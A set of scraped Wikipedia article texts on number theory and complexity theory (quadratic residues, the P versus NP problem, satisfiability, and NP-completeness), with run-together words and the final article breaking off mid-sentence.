algorithms that use quadratic residues and thelaw of quadratic reciprocity. Several modern factorization algorithms (includingDixon's algorithm, thecontinued fraction method, thequadratic sieve, and thenumber field sieve) generate small quadratic residues (modulo the number being factorized) in an attempt to find acongruence of squareswhich will yield a factorization. The number field sieve is the fastest general-purpose factorization algorithm known. The following table (sequenceA096008in theOEIS) lists the quadratic residues mod 1 to 75 (ared numbermeans it is not coprime ton). (For the quadratic residues coprime ton, seeOEIS:A096103, and for nonzero quadratic residues, seeOEIS:A046071.) TheDisquisitiones Arithmeticaehas been translated from Gauss'sCiceronian LatinintoEnglishandGerman. The German edition includes all of his papers on number theory: all the proofs of quadratic reciprocity, the determination of the sign of theGauss sum, the investigations intobiquadratic reciprocity, and unpublished notes.
https://en.wikipedia.org/wiki/Quadratic_residue
TheP versus NP problemis a majorunsolved problemintheoretical computer science. Informally, it asks whether every problem whose solution can be quickly verified can also be quickly solved. Here, "quickly" means an algorithm exists that solves the task and runs inpolynomial time(as opposed to, say,exponential time), meaning the task completion time isbounded aboveby apolynomial functionon the size of the input to the algorithm. The general class of questions that somealgorithmcan answer in polynomial time is "P" or "class P". For some questions, there is no known way to find an answer quickly, but if provided with an answer, it can be verified quickly. The class of questions where an answer can beverifiedin polynomial time is"NP", standing for "nondeterministic polynomial time".[Note 1] An answer to the P versus NP question would determine whether problems that can be verified in polynomial time can also be solved in polynomial time. If P ≠ NP, which is widely believed, it would mean that there are problems in NP that are harder to compute than to verify: they could not be solved in polynomial time, but the answer could be verified in polynomial time. The problem has been called the most important open problem incomputer science.[1]Aside from being an important problem incomputational theory, a proof either way would have profound implications for mathematics,cryptography, algorithm research,artificial intelligence,game theory, multimedia processing,philosophy,economicsand many other fields.[2] It is one of the sevenMillennium Prize Problemsselected by theClay Mathematics Institute, each of which carries a US$1,000,000 prize for the first correct solution. Consider the following yes/no problem: given an incompleteSudokugrid of sizen2×n2{\displaystyle n^{2}\times n^{2}}, is there at least one legal solution where every row, column, andn×n{\displaystyle n\times n}square contains the integers 1 throughn2{\displaystyle n^{2}}? It is straightforward to verify "yes" instances of this generalized Sudoku problem given a candidate solution. However, it is not known whether there is a polynomial-time algorithm that can correctly answer "yes" or "no" to all instances of this problem. Therefore, generalized Sudoku is in NP (quickly verifiable), but may or may not be in P (quickly solvable). (It is necessary to consider a generalized version of Sudoku, as any fixed size Sudoku has only a finite number of possible grids. In this case the problem is in P, as the answer can be found by table lookup.) The precise statement of the P versus NP problem was introduced in 1971 byStephen Cookin his seminal paper "The complexity of theorem proving procedures"[3](and independently byLeonid Levinin 1973[4]). Although the P versus NP problem was formally defined in 1971, there were previous inklings of the problems involved, the difficulty of proof, and the potential consequences. In 1955, mathematicianJohn Nashwrote a letter to theNSA, speculating that cracking a sufficiently complex code would require time exponential in the length of the key.[5]If proved (and Nash was suitably skeptical), this would imply what is now called P ≠ NP, since a proposed key can be verified in polynomial time. Another mention of the underlying problem occurred in a 1956 letter written byKurt GödeltoJohn von Neumann. Gödel asked whether theorem-proving (now known to beco-NP-complete) could be solved inquadraticorlinear time,[6]and pointed out one of the most important consequences—that if so, then the discovery of mathematical proofs could be automated. The relation between thecomplexity classesP and NP is studied incomputational complexity theory, the part of thetheory of computationdealing with the resources required during computation to solve a given problem. The most common resources are time (how many steps it takes to solve a problem) and space (how much memory it takes to solve a problem). In such analysis, a model of the computer for which time must be analyzed is required. Typically such models assume that the computer isdeterministic(given the computer's present state and any inputs, there is only one possible action that the computer might take) andsequential(it performs actions one after the other). In this theory, the class P consists of alldecision problems(definedbelow) solvable on a deterministic sequential machine in a durationpolynomialin the size of the input; the classNPconsists of all decision problems whose positive solutions are verifiable inpolynomial timegiven the right information, or equivalently, whose solution can be found in polynomial time on anon-deterministicmachine.[7]Clearly, P ⊆ NP. Arguably, the biggest open question intheoretical computer scienceconcerns the relationship between those two classes: Since 2002,William Gasarchhas conducted three polls of researchers concerning this and related questions.[8][9][10]Confidence that P ≠ NP has been increasing – in 2019, 88% believed P ≠ NP, as opposed to 83% in 2012 and 61% in 2002. When restricted to experts, the 2019 answers became 99% believed P ≠ NP.[10]These polls do not imply whether P = NP, Gasarch himself stated: "This does not bring us any closer to solving P=?NP or to knowing when it will be solved, but it attempts to be an objective report on the subjective opinion of this era." To attack the P = NP question, the concept of NP-completeness is very useful. NP-complete problems are problems that any other NP problem is reducible to in polynomial time and whose solution is still verifiable in polynomial time. That is, any NP problem can be transformed into any NP-complete problem. Informally, an NP-complete problem is an NP problem that is at least as "tough" as any other problem in NP. NP-hardproblems are those at least as hard as NP problems; i.e., all NP problems can be reduced (in polynomial time) to them. NP-hard problems need not be in NP; i.e., they need not have solutions verifiable in polynomial time. For instance, theBoolean satisfiability problemis NP-complete by theCook–Levin theorem, soanyinstance ofanyproblem in NP can be transformed mechanically into a Boolean satisfiability problem in polynomial time. The Boolean satisfiability problem is one of many NP-complete problems. If any NP-complete problem is in P, then it would follow that P = NP. However, many important problems are NP-complete, and no fast algorithm for any of them is known. From the definition alone it is unintuitive that NP-complete problems exist; however, a trivial NP-complete problem can be formulated as follows: given aTuring machineMguaranteed to halt in polynomial time, does a polynomial-size input thatMwill accept exist?[11]It is in NP because (given an input) it is simple to check whetherMaccepts the input by simulatingM; it is NP-complete because the verifier for any particular instance of a problem in NP can be encoded as a polynomial-time machineMthat takes the solution to be verified as input. Then the question of whether the instance is a yes or no instance is determined by whether a valid input exists. The first natural problem proven to be NP-complete was the Boolean satisfiability problem, also known as SAT. As noted above, this is the Cook–Levin theorem; its proof that satisfiability is NP-complete contains technical details about Turing machines as they relate to the definition of NP. However, after this problem was proved to be NP-complete,proof by reductionprovided a simpler way to show that many other problems are also NP-complete, including the game Sudoku discussed earlier. In this case, the proof shows that a solution of Sudoku in polynomial time could also be used to completeLatin squaresin polynomial time.[12]This in turn gives a solution to the problem of partitioningtri-partite graphsinto triangles,[13]which could then be used to find solutions for the special case of SAT known as 3-SAT,[14]which then provides a solution for general Boolean satisfiability. So a polynomial-time solution to Sudoku leads, by a series of mechanical transformations, to a polynomial time solution of satisfiability, which in turn can be used to solve any other NP-problem in polynomial time. Using transformations like this, a vast class of seemingly unrelated problems are all reducible to one another, and are in a sense "the same problem". Although it is unknown whether P = NP, problems outside of P are known. Just as the class P is defined in terms of polynomial running time, the classEXPTIMEis the set of all decision problems that haveexponentialrunning time. In other words, any problem in EXPTIME is solvable by adeterministic Turing machineinO(2p(n)) time, wherep(n) is a polynomial function ofn. A decision problem isEXPTIME-completeif it is in EXPTIME, and every problem in EXPTIME has apolynomial-time many-one reductionto it. A number of problems are known to be EXPTIME-complete. Because it can be shown that P ≠ EXPTIME, these problems are outside P, and so require more than polynomial time. In fact, by thetime hierarchy theorem, they cannot be solved in significantly less than exponential time. Examples include finding a perfect strategy forchesspositions on anN×Nboard[15]and similar problems for other board games.[16] The problem of deciding the truth of a statement inPresburger arithmeticrequires even more time.FischerandRabinproved in 1974[17]that every algorithm that decides the truth of Presburger statements of lengthnhas a runtime of at least22cn{\displaystyle 2^{2^{cn}}}for some constantc. Hence, the problem is known to need more than exponential run time. Even more difficult are theundecidable problems, such as thehalting problem. They cannot be completely solved by any algorithm, in the sense that for any particular algorithm there is at least one input for which that algorithm will not produce the right answer; it will either produce the wrong answer, finish without giving a conclusive answer, or otherwise run forever without producing any answer at all. It is also possible to consider questions other than decision problems. One such class, consisting of counting problems, is called#P: whereas an NP problem asks "Are there any solutions?", the corresponding #P problem asks "How many solutions are there?". Clearly, a #P problem must be at least as hard as the corresponding NP problem, since a count of solutions immediately tells if at least one solution exists, if the count is greater than zero. Surprisingly, some #P problems that are believed to be difficult correspond to easy (for example linear-time) P problems.[18]For these problems, it is very easy to tell whether solutions exist, but thought to be very hard to tell how many. Many of these problems are#P-complete, and hence among the hardest problems in #P, since a polynomial time solution to any of them would allow a polynomial time solution to all other #P problems. In 1975,Richard E. Ladnershowed that if P ≠ NP, then there exist problems in NP that are neither in P nor NP-complete.[19]Such problems are called NP-intermediate problems. Thegraph isomorphism problem, thediscrete logarithm problem, and theinteger factorization problemare examples of problems believed to be NP-intermediate. They are some of the very few NP problems not known to be in P or to be NP-complete. The graph isomorphism problem is the computational problem of determining whether two finitegraphsareisomorphic. An important unsolved problem in complexity theory is whether the graph isomorphism problem is in P, NP-complete, or NP-intermediate. The answer is not known, but it is believed that the problem is at least not NP-complete.[20]If graph isomorphism is NP-complete, thepolynomial time hierarchycollapses to its second level.[21]Since it is widely believed that the polynomial hierarchy does not collapse to any finite level, it is believed that graph isomorphism is not NP-complete. The best algorithm for this problem, due toLászló Babai, runs inquasi-polynomial time.[22] The integer factorization problem is the computational problem of determining theprime factorizationof a given integer. Phrased as a decision problem, it is the problem of deciding whether the input has a factor less thank. No efficient integer factorization algorithm is known, and this fact forms the basis of several modern cryptographic systems, such as theRSAalgorithm. The integer factorization problem is in NP and inco-NP(and even inUPand co-UP[23]). If the problem is NP-complete, the polynomial time hierarchy will collapse to its first level (i.e., NP = co-NP). The mostefficientknown algorithm for integer factorization is thegeneral number field sieve, which takes expected time to factor ann-bit integer. The best knownquantum algorithmfor this problem,Shor's algorithm, runs in polynomial time, although this does not indicate where the problem lies with respect to non-quantum complexity classes. All of the above discussion has assumed that P means "easy" and "not in P" means "difficult", an assumption known asCobham's thesis. It is a common assumption in complexity theory; but there are caveats. First, it can be false in practice. A theoretical polynomial algorithm may have extremely large constant factors or exponents, rendering it impractical. For example, the problem ofdecidingwhether a graphGcontainsHas aminor, whereHis fixed, can be solved in a running time ofO(n2),[25]wherenis the number of vertices inG. However, thebig O notationhides a constant that depends superexponentially onH. The constant is greater than2↑↑(2↑↑(2↑↑(h/2))){\displaystyle 2\uparrow \uparrow (2\uparrow \uparrow (2\uparrow \uparrow (h/2)))}(usingKnuth's up-arrow notation), and wherehis the number of vertices inH.[26] On the other hand, even if a problem is shown to be NP-complete, and even if P ≠ NP, there may still be effective approaches to the problem in practice. There are algorithms for many NP-complete problems, such as theknapsack problem, thetraveling salesman problem, and theBoolean satisfiability problem, that can solve to optimality many real-world instances in reasonable time. The empiricalaverage-case complexity(time vs. problem size) of such algorithms can be surprisingly low. An example is thesimplex algorithminlinear programming, which works surprisingly well in practice; despite having exponential worst-casetime complexity, it runs on par with the best known polynomial-time algorithms.[27] Finally, there are types of computations which do not conform to the Turing machine model on which P and NP are defined, such asquantum computationandrandomized algorithms. Cook provides a restatement of the problem inThe P Versus NP Problemas "Does P = NP?"[28]According to polls,[8][29]most computer scientists believe that P ≠ NP. A key reason for this belief is that after decades of studying these problems no one has been able to find a polynomial-time algorithm for any of more than 3,000 important known NP-complete problems (seeList of NP-complete problems). These algorithms were sought long before the concept of NP-completeness was even defined (Karp's 21 NP-complete problems, among the first found, were all well-known existing problems at the time they were shown to be NP-complete). Furthermore, the result P = NP would imply many other startling results that are currently believed to be false, such as NP =co-NPand P =PH. It is also intuitively argued that the existence of problems that are hard to solve but whose solutions are easy to verify matches real-world experience.[30] If P = NP, then the world would be a profoundly different place than we usually assume it to be. There would be no special value in "creative leaps", no fundamental gap between solving a problem and recognizing the solution once it's found. On the other hand, some researchers believe that it is overconfident to believe P ≠ NP and that researchers should also explore proofs of P = NP. For example, in 2002 these statements were made:[8] The main argument in favor of P ≠ NP is the total lack of fundamental progress in the area of exhaustive search. This is, in my opinion, a very weak argument. The space of algorithms is very large and we are only at the beginning of its exploration. [...] The resolution ofFermat's Last Theoremalso shows that very simple questions may be settled only by very deep theories. Being attached to a speculation is not a good guide to research planning. One should always try both directions of every problem. Prejudice has caused famous mathematicians to fail to solve famous problems whose solution was opposite to their expectations, even though they had developed all the methods required. When one substitutes "linear time on a multitape Turing machine" for "polynomial time" in the definitions of P and NP, one obtains the classesDLINandNLIN. It is known[31]that DLIN ≠ NLIN. One of the reasons the problem attracts so much attention is the consequences of the possible answers. Either direction of resolution would advance theory enormously, and perhaps have huge practical consequences as well. A proof that P = NP could have stunning practical consequences if the proof leads to efficient methods for solving some of the important problems in NP. The potential consequences, both positive and negative, arise since various NP-complete problems are fundamental in many fields. It is also very possible that a proof wouldnotlead to practical algorithms for NP-complete problems. The formulation of the problem does not require that the bounding polynomial be small or even specifically known. Anon-constructive proofmight show a solution exists without specifying either an algorithm to obtain it or a specific bound. Even if the proof is constructive, showing an explicit bounding polynomial and algorithmic details, if the polynomial is not very low-order the algorithm might not be sufficiently efficient in practice. In this case the initial proof would be mainly of interest to theoreticians, but the knowledge that polynomial time solutions are possible would surely spur research into better (and possibly practical) methods to achieve them. A solution showing P = NP could upend the field ofcryptography, which relies on certain problems being difficult. A constructive and efficient solution[Note 2]to an NP-complete problem such as3-SATwould break most existing cryptosystems including: These would need modification or replacement withinformation-theoretically securesolutions that do not assume P ≠ NP. There are also enormous benefits that would follow from rendering tractable many currently mathematically intractable problems. For instance, many problems inoperations researchare NP-complete, such as types ofinteger programmingand thetravelling salesman problem. Efficient solutions to these problems would have enormous implications for logistics. Many other important problems, such as some problems inprotein structure prediction, are also NP-complete;[35]making these problems efficiently solvable could considerably advance life sciences and biotechnology. These changes could be insignificant compared to the revolution that efficiently solving NP-complete problems would cause in mathematics itself. Gödel, in his early thoughts on computational complexity, noted that a mechanical method that could solve any problem would revolutionize mathematics:[36][37] If there really were a machine with φ(n) ∼k⋅n(or even ∼k⋅n2), this would have consequences of the greatest importance. Namely, it would obviously mean that in spite of the undecidability of theEntscheidungsproblem, the mental work of a mathematician concerning Yes-or-No questions could be completely replaced by a machine. After all, one would simply have to choose the natural numbernso large that when the machine does not deliver a result, it makes no sense to think more about the problem. Similarly,Stephen Cook(assuming not only a proof, but a practically efficient algorithm) says:[28] ... it would transform mathematics by allowing a computer to find a formal proof of any theorem which has a proof of a reasonable length, since formal proofs can easily be recognized in polynomial time. Example problems may well include all of theCMI prize problems. Research mathematicians spend their careers trying to prove theorems, and some proofs have taken decades or even centuries to find after problems have been stated—for instance,Fermat's Last Theoremtook over three centuries to prove. A method guaranteed to find a proof if a "reasonable" size proof exists, would essentially end this struggle. Donald Knuthhas stated that he has come to believe that P = NP, but is reserved about the impact of a possible proof:[38] [...] if you imagine a numberMthat's finite but incredibly large—like say the number 10↑↑↑↑3 discussed in my paper on "coping with finiteness"—then there's a humongous number of possible algorithms that donMbitwise or addition or shift operations onngiven bits, and it's really hard to believe that all of those algorithms fail. My main point, however, is that I don't believe that the equality P = NP will turn out to be helpful even if it is proved, because such a proof will almost surely be nonconstructive. A proof of P ≠ NP would lack the practical computational benefits of a proof that P = NP, but would represent a great advance in computational complexity theory and guide future research. It would demonstrate that many common problems cannot be solved efficiently, so that the attention of researchers can be focused on partial solutions or solutions to other problems. Due to widespread belief in P ≠ NP, much of this focusing of research has already taken place.[39] P ≠ NP still leaves open theaverage-case complexityof hard problems in NP. For example, it is possible that SAT requires exponential time in the worst case, but that almost all randomly selected instances of it are efficiently solvable.Russell Impagliazzohas described five hypothetical "worlds" that could result from different possible resolutions to the average-case complexity question.[40]These range from "Algorithmica", where P = NP and problems like SAT can be solved efficiently in all instances, to "Cryptomania", where P ≠ NP and generating hard instances of problems outside P is easy, with three intermediate possibilities reflecting different possible distributions of difficulty over instances of NP-hard problems. The "world" where P ≠ NP but all problems in NP are tractable in the average case is called "Heuristica" in the paper. APrinceton Universityworkshop in 2009 studied the status of the five worlds.[41] Although the P = NP problem itself remains open despite a million-dollar prize and a huge amount of dedicated research, efforts to solve the problem have led to several new techniques. In particular, some of the most fruitful research related to the P = NP problem has been in showing that existing proof techniques are insufficient for answering the question, suggesting novel technical approaches are required. As additional evidence for the difficulty of the problem, essentially all known proof techniques incomputational complexity theoryfall into one of the following classifications, all insufficient to prove P ≠ NP: These barriers are another reason why NP-complete problems are useful: if a polynomial-time algorithm can be demonstrated for an NP-complete problem, this would solve the P = NP problem in a way not excluded by the above results. These barriers lead some computer scientists to suggest the P versus NP problem may beindependentof standard axiom systems likeZFC(cannot be proved or disproved within them). An independence result could imply that either P ≠ NP and this is unprovable in (e.g.) ZFC, or that P = NP but it is unprovable in ZFC that any polynomial-time algorithms are correct.[45]However, if the problem is undecidable even with much weaker assumptions extending thePeano axiomsfor integer arithmetic, then nearly polynomial-time algorithms exist for all NP problems.[46]Therefore, assuming (as most complexity theorists do) some NP problems don't have efficient algorithms, proofs of independence with those techniques are impossible. This also implies proving independence from PA or ZFC with current techniques is no easier than proving all NP problems have efficient algorithms. The P = NP problem can be restated as certain classes of logical statements, as a result of work indescriptive complexity. Consider all languages of finite structures with a fixedsignatureincluding alinear orderrelation. Then, all such languages in P are expressible infirst-order logicwith the addition of a suitable leastfixed-point combinator. Recursive functions can be defined with this and the order relation. As long as the signature contains at least one predicate or function in addition to the distinguished order relation, so that the amount of space taken to store such finite structures is actually polynomial in the number of elements in the structure, this precisely characterizes P. Similarly, NP is the set of languages expressible in existentialsecond-order logic—that is, second-order logic restricted to excludeuniversal quantificationover relations, functions, and subsets. The languages in thepolynomial hierarchy,PH, correspond to all of second-order logic. Thus, the question "is P a proper subset of NP" can be reformulated as "is existential second-order logic able to describe languages (of finite linearly ordered structures with nontrivial signature) that first-order logic with least fixed point cannot?".[47]The word "existential" can even be dropped from the previous characterization, since P = NP if and only if P = PH (as the former would establish that NP = co-NP, which in turn implies that NP = PH). No known algorithm for a NP-complete problem runs in polynomial time. However, there are algorithms known for NP-complete problems that if P = NP, the algorithm runs in polynomial time on accepting instances (although with enormous constants, making the algorithm impractical). However, these algorithms do not qualify as polynomial time because their running time on rejecting instances are not polynomial. The following algorithm, due toLevin(without any citation), is such an example below. It correctly accepts the NP-complete languageSUBSET-SUM. It runs in polynomial time on inputs that are in SUBSET-SUM if and only if P = NP: This is a polynomial-time algorithm accepting an NP-complete language only if P = NP. "Accepting" means it gives "yes" answers in polynomial time, but is allowed to run forever when the answer is "no" (also known as asemi-algorithm). This algorithm is enormously impractical, even if P = NP. If the shortest program that can solve SUBSET-SUM in polynomial time isbbits long, the above algorithm will try at least2b− 1other programs first. Adecision problemis a problem that takes as input somestringwover an alphabet Σ, and outputs "yes" or "no". If there is analgorithm(say aTuring machine, or acomputer programwith unbounded memory) that produces the correct answer for any input string of lengthnin at mostcnksteps, wherekandcare constants independent of the input string, then we say that the problem can be solved inpolynomial timeand we place it in the class P. Formally, P is the set of languages that can be decided by a deterministic polynomial-time Turing machine. Meaning, where and a deterministic polynomial-time Turing machine is a deterministic Turing machineMthat satisfies two conditions: NP can be defined similarly using nondeterministic Turing machines (the traditional way). However, a modern approach uses the concept ofcertificateandverifier. Formally, NP is the set of languages with a finite alphabet and verifier that runs in polynomial time. The following defines a "verifier": LetLbe a language over a finite alphabet, Σ. L∈ NP if, and only if, there exists a binary relationR⊂Σ∗×Σ∗{\displaystyle R\subset \Sigma ^{*}\times \Sigma ^{*}}and a positive integerksuch that the following two conditions are satisfied: A Turing machine that decidesLRis called averifierforLand aysuch that (x,y) ∈Ris called acertificate of membershipofxinL. Not all verifiers must be polynomial-time. However, forLto be in NP, there must be a verifier that runs in polynomial time. Let Whether a value ofxiscompositeis equivalent to of whetherxis a member of COMPOSITE. It can be shown that COMPOSITE ∈ NP by verifying that it satisfies the above definition (if we identify natural numbers with their binary representations). COMPOSITE also happens to be in P, a fact demonstrated by the invention of theAKS primality test.[48] There are many equivalent ways of describing NP-completeness. LetLbe a language over a finite alphabet Σ. Lis NP-complete if, and only if, the following two conditions are satisfied: Alternatively, ifL∈ NP, and there is another NP-complete problem that can be polynomial-time reduced toL, thenLis NP-complete. This is a common way of proving some new problem is NP-complete. While the P versus NP problem is generally considered unsolved,[49]many amateur and some professional researchers have claimed solutions.Gerhard J. Woegingercompiled a list of 116 purported proofs from 1986 to 2016, of which 61 were proofs of P = NP, 49 were proofs of P ≠ NP, and 6 proved other results, e.g. that the problem is undecidable.[50]Some attempts at resolving P versus NP have received brief media attention,[51]though these attempts have been refuted. The filmTravelling Salesman, by director Timothy Lanzone, is the story of four mathematicians hired by the US government to solve the P versus NP problem.[52] In the sixth episode ofThe Simpsons'seventh season "Treehouse of Horror VI", the equation P = NP is seen shortly after Homer accidentally stumbles into the "third dimension".[53][54] In the second episode of season 2 ofElementary,"Solve for X"Sherlock and Watson investigate the murders of mathematicians who were attempting to solve P versus NP.[55][56]
https://en.wikipedia.org/wiki/P_vs_NP_problem
Inmathematical logic, aformulaissatisfiableif it is true under some assignment of values to itsvariables. For example, the formulax+3=y{\displaystyle x+3=y}is satisfiable because it is true whenx=3{\displaystyle x=3}andy=6{\displaystyle y=6}, while the formulax+1=x{\displaystyle x+1=x}is not satisfiable over the integers. The dual concept to satisfiability isvalidity; a formula isvalidif every assignment of values to its variables makes the formula true. For example,x+3=3+x{\displaystyle x+3=3+x}is valid over the integers, butx+3=y{\displaystyle x+3=y}is not. Formally, satisfiability is studied with respect to a fixed logic defining thesyntaxof allowed symbols, such asfirst-order logic,second-order logicorpropositional logic. Rather than being syntactic, however, satisfiability is asemanticproperty because it relates to themeaningof the symbols, for example, the meaning of+{\displaystyle +}in a formula such asx+1=x{\displaystyle x+1=x}. Formally, we define aninterpretation(ormodel) to be an assignment of values to the variables and an assignment of meaning to all other non-logical symbols, and a formula is said to be satisfiable if there is some interpretation which makes it true.[1]While this allows non-standard interpretations of symbols such as+{\displaystyle +}, one can restrict their meaning by providing additionalaxioms. Thesatisfiability modulo theoriesproblem considers satisfiability of a formula with respect to aformal theory, which is a (finite or infinite) set of axioms. Satisfiability and validity are defined for a single formula, but can be generalized to an arbitrary theory or set of formulas: a theory is satisfiable if at least one interpretation makes every formula in the theory true, and valid if every formula is true in every interpretation. For example, theories of arithmetic such asPeano arithmeticare satisfiable because they are true in the natural numbers. This concept is closely related to theconsistencyof a theory, and in fact is equivalent to consistency for first-order logic, a result known asGödel's completeness theorem. The negation of satisfiability is unsatisfiability, and the negation of validity is invalidity. These four concepts are related to each other in a manner exactly analogous toAristotle'ssquare of opposition. Theproblemof determining whether a formula inpropositional logicis satisfiable isdecidable, and is known as theBoolean satisfiability problem, or SAT. In general, the problem of determining whether a sentence offirst-order logicis satisfiable is not decidable. Inuniversal algebra,equational theory, andautomated theorem proving, the methods ofterm rewriting,congruence closureandunificationare used to attempt to decide satisfiability. Whether a particulartheoryis decidable or not depends whether the theory isvariable-freeand on other conditions.[2] Forclassical logicswith negation, it is generally possible to re-express the question of the validity of a formula to one involving satisfiability, because of the relationships between the concepts expressed in the above square of opposition. In particular φ is valid if and only if ¬φ is unsatisfiable, which is to say it is false that ¬φ is satisfiable. Put another way, φ is satisfiable if and only if ¬φ is invalid. For logics without negation, such as thepositive propositional calculus, the questions of validity and satisfiability may be unrelated. In the case of thepositive propositional calculus, the satisfiability problem is trivial, as every formula is satisfiable, while the validity problem isco-NP complete. In the case ofclassical propositional logic, satisfiability is decidable for propositional formulae. In particular, satisfiability is anNP-completeproblem, and is one of the most intensively studied problems incomputational complexity theory. Forfirst-order logic(FOL), satisfiability isundecidable. More specifically, it is aco-RE-completeproblem and therefore notsemidecidable.[3]This fact has to do with the undecidability of the validity problem for FOL. The question of the status of the validity problem was posed firstly byDavid Hilbert, as the so-calledEntscheidungsproblem. The universal validity of a formula is a semi-decidable problem byGödel's completeness theorem. If satisfiability were also a semi-decidable problem, then the problem of the existence of counter-models would be too (a formula has counter-models iff its negation is satisfiable). So the problem of logical validity would be decidable, which contradicts theChurch–Turing theorem, a result stating the negative answer for the Entscheidungsproblem. Inmodel theory, anatomic formulais satisfiable if there is a collection of elements of astructurethat render the formula true.[4]IfAis a structure, φ is a formula, andais a collection of elements, taken from the structure, that satisfy φ, then it is commonly written that If φ has no free variables, that is, if φ is anatomic sentence, and it is satisfied byA, then one writes In this case, one may also say thatAis a model for φ, or that φ istrueinA. IfTis a collection of atomic sentences (a theory) satisfied byA, one writes A problem related to satisfiability is that offinite satisfiability, which is the question of determining whether a formula admits afinitemodel that makes it true. For a logic that has thefinite model property, the problems of satisfiability and finite satisfiability coincide, as a formula of that logic has a model if and only if it has a finite model. This question is important in the mathematical field offinite model theory. Finite satisfiability and satisfiability need not coincide in general. For instance, consider thefirst-order logicformula obtained as theconjunctionof the following sentences, wherea0{\displaystyle a_{0}}anda1{\displaystyle a_{1}}areconstants: The resulting formula has the infinite modelR(a0,a1),R(a1,a2),…{\displaystyle R(a_{0},a_{1}),R(a_{1},a_{2}),\ldots }, but it can be shown that it has no finite model (starting at the factR(a0,a1){\displaystyle R(a_{0},a_{1})}and following the chain ofR{\displaystyle R}atomsthat must exist by the second axiom, the finiteness of a model would require the existence of a loop, which would violate the third and fourth axioms, whether it loops back ona0{\displaystyle a_{0}}or on a different element). Thecomputational complexityof deciding satisfiability for an input formula in a given logic may differ from that of deciding finite satisfiability; in fact, for some logics, only one of them isdecidable. For classicalfirst-order logic, finite satisfiability isrecursively enumerable(in classRE) andundecidablebyTrakhtenbrot's theoremapplied to the negation of the formula. Numerical constraints[clarify]often appear in the field ofmathematical optimization, where one usually wants to maximize (or minimize) an objective function subject to some constraints. However, leaving aside the objective function, the basic issue of simply deciding whether the constraints are satisfiable can be challenging or undecidable in some settings. The following table summarizes the main cases. Table source: Bockmayr and Weispfenning.[5]: 754 For linear constraints, a fuller picture is provided by the following table. Table source: Bockmayr and Weispfenning.[5]: 755
https://en.wikipedia.org/wiki/Satisfiability
Incomputational complexity theory, a problem isNP-completewhen: The name "NP-complete" is short for "nondeterministic polynomial-time complete". In this name, "nondeterministic" refers tonondeterministic Turing machines, a way of mathematically formalizing the idea of a brute-force search algorithm.Polynomial timerefers to an amount of time that is considered "quick" for adeterministic algorithmto check a single solution, or for a nondeterministic Turing machine to perform the whole search. "Complete" refers to the property of being able to simulate everything in the samecomplexity class. More precisely, each input to the problem should be associated with a set of solutions of polynomial length, the validity of each of which can be tested quickly (inpolynomial time),[2]such that the output for any input is "yes" if the solution set is non-empty and "no" if it is empty. The complexity class of problems of this form is calledNP, an abbreviation for "nondeterministic polynomial time". A problem is said to beNP-hardif everything in NP can be transformed in polynomial time into it even though it may not be in NP. A problem is NP-complete if it is both in NP and NP-hard. The NP-complete problems represent the hardest problems in NP. If some NP-complete problem has a polynomial time algorithm, all problems in NP do. The set of NP-complete problems is often denoted byNP-CorNPC. Although a solution to an NP-complete problem can beverified"quickly", there is no known way tofinda solution quickly. That is, the time required to solve the problem using any currently knownalgorithmincreases rapidly as the size of the problem grows. As a consequence, determining whether it is possible to solve these problems quickly, called theP versus NP problem, is one of the fundamentalunsolved problems in computer sciencetoday. While a method for computing the solutions to NP-complete problems quickly remains undiscovered,computer scientistsandprogrammersstill frequently encounter NP-complete problems. NP-complete problems are often addressed by usingheuristicmethods andapproximation algorithms. NP-complete problems are inNP, the set of alldecision problemswhose solutions can be verified in polynomial time;NPmay be equivalently defined as the set of decision problems that can be solved in polynomial time on anon-deterministic Turing machine. A problempin NP is NP-complete if every other problem in NP can be transformed (or reduced) intopin polynomial time.[citation needed] It is not known whether every problem in NP can be quickly solved—this is called theP versus NP problem. But ifany NP-complete problemcan be solved quickly, thenevery problem in NPcan, because the definition of an NP-complete problem states that every problem in NP must be quickly reducible to every NP-complete problem (that is, it can be reduced in polynomial time). Because of this, it is often said that NP-complete problems areharderormore difficultthan NP problems in general.[citation needed] A decision problemC{\displaystyle \scriptstyle C}is NP-complete if:[citation needed] C{\displaystyle \scriptstyle C}can be shown to be in NP by demonstrating that a candidate solution toC{\displaystyle \scriptstyle C}can be verified in polynomial time. Note that a problem satisfying condition 2 is said to beNP-hard, whether or not it satisfies condition 1.[4] A consequence of this definition is that if we had a polynomial time algorithm (on aUTM, or any otherTuring-equivalentabstract machine) forC{\displaystyle \scriptstyle C}, we could solve all problems in NP in polynomial time. The concept of NP-completeness was introduced in 1971 (seeCook–Levin theorem), though the termNP-completewas introduced later. At the 1971STOCconference, there was a fierce debate between the computer scientists about whether NP-complete problems could be solved in polynomial time on adeterministicTuring machine.John Hopcroftbrought everyone at the conference to a consensus that the question of whether NP-complete problems are solvable in polynomial time should be put off to be solved at some later date, since nobody had any formal proofs for their claims one way or the other.[citation needed]This is known as "the question of whether P=NP". Nobody has yet been able to determine conclusively whether NP-complete problems are in fact solvable in polynomial time, making this one of the greatunsolved problems of mathematics. TheClay Mathematics Instituteis offering a US$1 million reward (Millennium Prize) to anyone who has a formal proof that P=NP or that P≠NP.[5] The existence of NP-complete problems is not obvious. TheCook–Levin theoremstates that theBoolean satisfiability problemis NP-complete, thus establishing that such problems do exist. In 1972,Richard Karpproved that several other problems were also NP-complete (seeKarp's 21 NP-complete problems); thus, there is a class of NP-complete problems (besides the Boolean satisfiability problem). Since the original results, thousands of other problems have been shown to be NP-complete by reductions from other problems previously shown to be NP-complete; many of these problems are collected inGarey & Johnson (1979). The easiest way to prove that some new problem is NP-complete is first to prove that it is in NP, and then to reduce some known NP-complete problem to it. Therefore, it is useful to know a variety of NP-complete problems. The list below contains some well-known problems that are NP-complete when expressed as decision problems. To the right is a diagram of some of the problems and thereductionstypically used to prove their NP-completeness. In this diagram, problems are reduced from bottom to top. Note that this diagram is misleading as a description of the mathematical relationship between these problems, as there exists apolynomial-time reductionbetween any two NP-complete problems; but it indicates where demonstrating this polynomial-time reduction has been easiest. There is often only a small difference between a problem in P and an NP-complete problem. For example, the3-satisfiabilityproblem, a restriction of the Boolean satisfiability problem, remains NP-complete, whereas the slightly more restricted2-satisfiabilityproblem is in P (specifically, it isNL-complete), but the slightly more general max. 2-sat. problem is again NP-complete. Determining whether a graph can be colored with 2 colors is in P, but with 3 colors is NP-complete, even when restricted toplanar graphs. Determining if a graph is acycleor isbipartiteis very easy (inL), but finding a maximum bipartite or a maximum cycle subgraph is NP-complete. A solution of theknapsack problemwithin any fixed percentage of the optimal solution can be computed in polynomial time, but finding the optimal solution is NP-complete. An interesting example is thegraph 